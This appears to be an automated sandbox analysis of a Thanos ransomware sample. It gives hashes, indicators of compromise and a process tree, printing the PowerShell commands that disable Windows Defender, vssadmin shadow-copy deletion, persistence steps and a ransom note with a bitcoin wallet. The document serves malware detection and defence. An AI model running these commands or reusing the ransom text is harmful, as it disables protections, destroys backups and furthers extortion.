Overview
overview
10Static
static
10Ransomware.Thanos.zip
windows7-x64
1Ransomware.Thanos.zip
windows10-1703-x64
1Ransomware.Thanos.zip
windows10-2004-x64
1Ransomware.Thanos.zip
windows11-21h2-x64
158bfb9fa88...1f.exe
windows7-x64
58bfb9fa88...1f.exe
windows10-1703-x64
1058bfb9fa88...1f.exe
windows10-2004-x64
1058bfb9fa88...1f.exe
windows11-21h2-x64
105d40615701...3d.exe
windows7-x64
95d40615701...3d.exe
windows10-1703-x64
5d40615701...3d.exe
windows10-2004-x64
95d40615701...3d.exe
windows11-21h2-x64
9ae66e009e1...75.exe
windows7-x64
ae66e009e1...75.exe
windows10-1703-x64
ae66e009e1...75.exe
windows10-2004-x64
ae66e009e1...75.exe
windows11-21h2-x64
c460fc0d4f...50.exe
windows7-x64
c460fc0d4f...50.exe
windows10-1703-x64
10c460fc0d4f...50.exe
windows10-2004-x64
10c460fc0d4f...50.exe
windows11-21h2-x64
10Analysis
-
max time kernel
127s -
max time network
157s -
platform
windows10-1703_x64 -
resource
win10-20240214-en -
resource tags
arch:x64arch:x86image:win10-20240214-enlocale:en-usos:windows10-1703-x64system -
submitted
19-02-2024 14:29
Behavioral task
behavioral1
Sample
Ransomware.Thanos.zip
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
Ransomware.Thanos.zip
Resource
win10-20240214-en
Behavioral task
behavioral3
Sample
Ransomware.Thanos.zip
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
Ransomware.Thanos.zip
Resource
win11-20240214-en
Behavioral task
behavioral5
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win10-20240214-en
Behavioral task
behavioral7
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral8
Sample
58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
Resource
win11-20240214-en
Behavioral task
behavioral9
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win10-20240214-en
Behavioral task
behavioral11
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral12
Sample
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe
Resource
win11-20240214-en
Behavioral task
behavioral13
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win10-20240214-en
Behavioral task
behavioral15
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral16
Sample
ae66e009e16f0fad3b70ad20801f48f2edb904fa5341a89e126a26fd3fc80f75.exe
Resource
win11-20240214-en
Behavioral task
behavioral17
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win10-20240214-en
Behavioral task
behavioral19
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral20
Sample
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
Resource
win11-20240214-en
General
-
Target
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
-
Size
87KB
-
MD5
d6d956267a268c9dcf48445629d2803e
-
SHA1
cc0feae505dad9c140dd21d1b40b518d8e61b3a4
-
SHA256
c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850
-
SHA512
e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee
-
SSDEEP
1536:OXMLuZQG3KJ3QaIH9shR4fZcvr4C9u3MTIdD9mtthd9JovrgmqhtvM4CoLT6QPbc:gMLuZraJ3a0ehcvv9sM+9mtthd0gmWkr
Malware Config
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral18/memory/3836-0-0x0000000000570000-0x000000000058C000-memory.dmp disable_win_def -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 11 6540 mshta.exe 13 6540 mshta.exe 16 6540 mshta.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe -
Enumerates connected drives 3 TTPs 16 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\e: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\h: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\g: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 raw.githubusercontent.com 1 raw.githubusercontent.com -
Modifies WinLogon 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5888 sc.exe 5880 sc.exe 5872 sc.exe 5864 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 6132 vssadmin.exe 6116 vssadmin.exe 6088 vssadmin.exe 6040 vssadmin.exe 3328 vssadmin.exe 6124 vssadmin.exe 6100 vssadmin.exe 6140 vssadmin.exe 6072 vssadmin.exe 6064 vssadmin.exe 6048 vssadmin.exe 6108 vssadmin.exe 6080 vssadmin.exe 6056 vssadmin.exe -
Kills process with taskkill 3 IoCs
pid Process 5928 taskkill.exe 6032 taskkill.exe 5920 taskkill.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 6912 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 4668 powershell.exe 4668 powershell.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 4668 powershell.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe Token: SeDebugPrivilege 4668 powershell.exe Token: SeIncreaseQuotaPrivilege 4668 powershell.exe Token: SeSecurityPrivilege 4668 powershell.exe Token: SeTakeOwnershipPrivilege 4668 powershell.exe Token: SeLoadDriverPrivilege 4668 powershell.exe Token: SeSystemProfilePrivilege 4668 powershell.exe Token: SeSystemtimePrivilege 4668 powershell.exe Token: SeProfSingleProcessPrivilege 4668 powershell.exe Token: SeIncBasePriorityPrivilege 4668 powershell.exe Token: SeCreatePagefilePrivilege 4668 powershell.exe Token: SeBackupPrivilege 4668 powershell.exe Token: SeRestorePrivilege 4668 powershell.exe Token: SeShutdownPrivilege 4668 powershell.exe Token: SeDebugPrivilege 4668 powershell.exe Token: SeSystemEnvironmentPrivilege 4668 powershell.exe Token: SeRemoteShutdownPrivilege 4668 powershell.exe Token: SeUndockPrivilege 4668 powershell.exe Token: SeManageVolumePrivilege 4668 powershell.exe Token: 33 4668 powershell.exe Token: 34 4668 powershell.exe Token: 35 4668 powershell.exe Token: 36 4668 powershell.exe Token: SeDebugPrivilege 4560 powershell.exe Token: SeDebugPrivilege 4128 powershell.exe Token: SeDebugPrivilege 3324 powershell.exe Token: SeDebugPrivilege 4588 powershell.exe Token: SeDebugPrivilege 192 powershell.exe Token: SeDebugPrivilege 4384 powershell.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeDebugPrivilege 3240 powershell.exe Token: SeDebugPrivilege 2204 powershell.exe Token: SeDebugPrivilege 4272 powershell.exe Token: SeDebugPrivilege 4268 powershell.exe Token: SeDebugPrivilege 4224 powershell.exe Token: SeDebugPrivilege 6032 taskkill.exe Token: SeDebugPrivilege 5920 taskkill.exe Token: SeDebugPrivilege 5928 taskkill.exe Token: SeBackupPrivilege 7424 vssvc.exe Token: SeRestorePrivilege 7424 vssvc.exe Token: SeAuditPrivilege 7424 vssvc.exe Token: SeIncreaseQuotaPrivilege 4128 powershell.exe Token: SeSecurityPrivilege 4128 powershell.exe Token: SeTakeOwnershipPrivilege 4128 powershell.exe Token: SeLoadDriverPrivilege 4128 powershell.exe Token: SeSystemProfilePrivilege 4128 powershell.exe Token: SeSystemtimePrivilege 4128 powershell.exe Token: SeProfSingleProcessPrivilege 4128 powershell.exe Token: SeIncBasePriorityPrivilege 4128 powershell.exe Token: SeCreatePagefilePrivilege 4128 powershell.exe Token: SeBackupPrivilege 4128 powershell.exe Token: SeRestorePrivilege 4128 powershell.exe Token: SeShutdownPrivilege 4128 powershell.exe Token: SeDebugPrivilege 4128 powershell.exe Token: SeSystemEnvironmentPrivilege 4128 powershell.exe Token: SeRemoteShutdownPrivilege 4128 powershell.exe Token: SeUndockPrivilege 4128 powershell.exe Token: SeManageVolumePrivilege 4128 powershell.exe Token: 33 4128 powershell.exe Token: 34 4128 powershell.exe Token: 35 4128 powershell.exe Token: 36 4128 powershell.exe Token: SeIncreaseQuotaPrivilege 3324 powershell.exe Token: SeSecurityPrivilege 3324 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3836 wrote to memory of 4668 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 74 PID 3836 wrote to memory of 4668 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 74 PID 3836 wrote to memory of 4560 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 77 PID 3836 wrote to memory of 4560 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 77 PID 3836 wrote to memory of 4128 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 79 PID 3836 wrote to memory of 4128 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 79 PID 3836 wrote to memory of 4588 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 81 PID 3836 wrote to memory of 4588 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 81 PID 3836 wrote to memory of 3324 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 83 PID 3836 wrote to memory of 3324 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 83 PID 3836 wrote to memory of 192 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 84 PID 3836 wrote to memory of 192 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 84 PID 3836 wrote to memory of 4384 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 87 PID 3836 wrote to memory of 4384 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 87 PID 3836 wrote to memory of 2204 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 89 PID 3836 wrote to memory of 2204 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 89 PID 3836 wrote to memory of 1676 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 91 PID 3836 wrote to memory of 1676 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 91 PID 3836 wrote to memory of 3240 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 93 PID 3836 wrote to memory of 3240 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 93 PID 3836 wrote to memory of 4272 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 94 PID 3836 wrote to memory of 4272 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 94 PID 3836 wrote to memory of 4268 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 96 PID 3836 wrote to memory of 4268 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 96 PID 3836 wrote to memory of 4224 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 98 PID 3836 wrote to memory of 4224 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 98 PID 3836 wrote to memory of 2360 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 253 PID 3836 wrote to memory of 2360 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 253 PID 3836 wrote to memory of 2888 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 252 PID 3836 wrote to memory of 2888 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 252 PID 3836 wrote to memory of 3340 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 251 PID 3836 wrote to memory of 3340 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 251 PID 3836 wrote to memory of 3648 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 250 PID 3836 wrote to memory of 3648 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 250 PID 3836 wrote to memory of 4148 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 249 PID 3836 wrote to memory of 4148 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 249 PID 3836 wrote to memory of 2040 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 248 PID 3836 wrote to memory of 2040 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 248 PID 3836 wrote to memory of 1940 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 247 PID 3836 wrote to memory of 1940 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 247 PID 3836 wrote to memory of 3368 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 246 PID 3836 wrote to memory of 3368 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 246 PID 3836 wrote to memory of 2968 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 245 PID 3836 wrote to memory of 2968 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 245 PID 3836 wrote to memory of 2972 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 244 PID 3836 wrote to memory of 2972 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 244 PID 3836 wrote to memory of 5008 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 243 PID 3836 wrote to memory of 5008 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 243 PID 3836 wrote to memory of 3312 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 242 PID 3836 wrote to memory of 3312 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 242 PID 3836 wrote to memory of 1876 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 241 PID 3836 wrote to memory of 1876 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 241 PID 3836 wrote to memory of 4308 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 240 PID 3836 wrote to memory of 4308 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 240 PID 3836 wrote to memory of 4512 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 239 PID 3836 wrote to memory of 4512 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 239 PID 3836 wrote to memory of 4216 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 238 PID 3836 wrote to memory of 4216 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 238 PID 3836 wrote to memory of 4304 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 135 PID 3836 wrote to memory of 4304 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 135 PID 3836 wrote to memory of 4440 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 134 PID 3836 wrote to memory of 4440 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 134 PID 3836 wrote to memory of 4728 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 133 PID 3836 wrote to memory of 4728 3836 c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe 133 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe"C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Drops startup file
- Modifies WinLogon
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3836 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4668
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
